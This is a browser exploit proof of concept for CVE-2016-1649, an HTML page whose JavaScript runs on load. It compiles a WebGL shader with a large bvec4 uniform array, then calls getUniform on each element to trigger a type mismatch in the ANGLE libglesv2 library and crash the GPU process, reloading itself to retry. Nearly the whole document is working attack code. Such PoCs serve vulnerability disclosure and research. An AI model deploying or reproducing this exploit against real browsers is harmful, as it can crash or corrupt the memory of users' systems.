PoC.html

<html>
<TITLE>
CVE-2016-1649 PoC
</TITLE>
<META HTTP-EQUIV="pragma" CONTENT="no-cache"> 
<META HTTP-EQUIV="Cache-Control" CONTENT="no-store, must-revalidate"> 
<META HTTP-EQUIV="expires" CONTENT="0">
<style>
div,h3
{
	font-family: Courier
}
</style>
<body onload="crash();">
<canvas id="canvas" width="200" height="200"></canvas>
<div id="e_div"></div>
<script>
/*********************************************************
*functions used for debugging defined here
*********************************************************/
function log(info)
{
	document.getElementById("e_div").innerHTML += "<h3>"+ info +"</h3>"
}

function fail(reason)
{
	log("[*]fail: " + reason)
	log("[*]Aw, Snap:( You'd better have a cup of tea and try again.")
	setTimeout(function(){window.location.reload(true)}, 10000)
}

function load_shader(gl, source, type)
{
	/*create shader object*/
	var shader = gl.createShader(type);
	if (shader == null) {
		fail("[*]unable to create shader.")
		return null;
	}
	
	/*load shader from source code*/
	gl.shaderSource(shader, source)
	var err = gl.getError()
	if(gl.NO_ERROR != err)
	{
		fail("[*]loading shader error.")
		return null
	}
	
	gl.compileShader(shader)
	/*check the compiler state*/
	var compiled = gl.getShaderParameter(shader, gl.COMPILE_STATUS);
	if (!compiled) {
		last_error = gl.getShaderInfoLog(shader);
		fail("[*]compiling shader " + last_error + ".");
		gl.deleteShader(shader);
		return null;
	}
	return shader;

}


function crash()
{
	var element_count = 250
	/*init WebGL*/
    var canvas = document.getElementById('canvas');
    var gl 	   = canvas.getContext("webgl")
	if (!gl) 
	{
        fail("no webgl context found.")
        return;
    }
	
	var program = gl.createProgram()
	
	/*
		avalible uniform type:
		int 			libglesv2!gl::Program::getUniformInternal<int>
		ivec2			libglesv2!gl::Program::getUniformInternal<int>
		ivec3			libglesv2!gl::Program::getUniformInternal<int>
		ivec4			libglesv2!gl::Program::getUniformInternal<int>
		bool 			libglesv2!gl::Program::getUniformInternal<int> 		 (*mismatch*)
		bvec2			libglesv2!gl::Program::getUniformInternal<int> 	     (*mismatch*)
		bvec3			libglesv2!gl::Program::getUniformInternal<int> 	     (*mismatch*)
		bvec4			libglesv2!gl::Program::getUniformInternal<int> 	     (*mismatch*)
		
		float			libglesv2!gl::Program::getUniformInternal<float>
		vec2			libglesv2!gl::Program::getUniformInternal<float>
		vec3 			libglesv2!gl::Program::getUniformInternal<float>
		vec4			libglesv2!gl::Program::getUniformInternal<float>
		mat2			libglesv2!gl::Program::getUniformInternal<float>
		mat3			libglesv2!gl::Program::getUniformInternal<float>
	*/
	
	var vs_code 	= 	"uniform bvec4 uBool[" + element_count.toString() +"];\n" +
						"void main()\n"											  +
						"{\n"													  +
						"	gl_Position = vec4(1.0 + float(uBool[0][0]) + float(uBool[0][1]) + float(uBool[0][2]) + float(uBool[0][3]) + float(uBool[1][0]) + float(uBool[1][1]) + float(uBool[1][2]) + float(uBool[1][3]) + float(uBool[2][0]) + float(uBool[2][1]) + float(uBool[2][2]) + float(uBool[2][3]) + float(uBool[3][0]) + float(uBool[3][1]) + float(uBool[3][2]) + float(uBool[3][3]));\n" +
						"}\n"

	
	var fs_code		=  "void main()\n" 				 					+
					   "{\n"											+
					   " gl_FragColor = vec4(1.0, 0.0, 0.0, 1.0);\n"	+
					   "}\n"
	
	var vs   = load_shader(gl, vs_code, gl.VERTEX_SHADER)
	var fs   = load_shader(gl, fs_code, gl.FRAGMENT_SHADER)
	
	if(null == vs || null == fs)
	{
		return
	}
	
	gl.attachShader(program, vs)
	gl.attachShader(program, fs)
	
	gl.linkProgram(program)
	
	/*check the link status*/
	var linked = gl.getProgramParameter(program, gl.LINK_STATUS)
	if (!linked) 
	{
		last_error  = gl.getProgramInfoLog (program);
		fail("Error in program linking " + last_error);
		gl.deleteProgram(program);
		return;
	}
	
	gl.useProgram(program)
	
	for(var i=0; i<element_count; i++)
	{	
		var location 	= gl.getUniformLocation(program, "uBool[" + i.toString () + "]")
		gl.getUniform(program, location)
	}
	
	/*
		GPU process still alive? Well let's try again:(
	*/
	window.location.reload(false)
}


</script>
</body>
</html>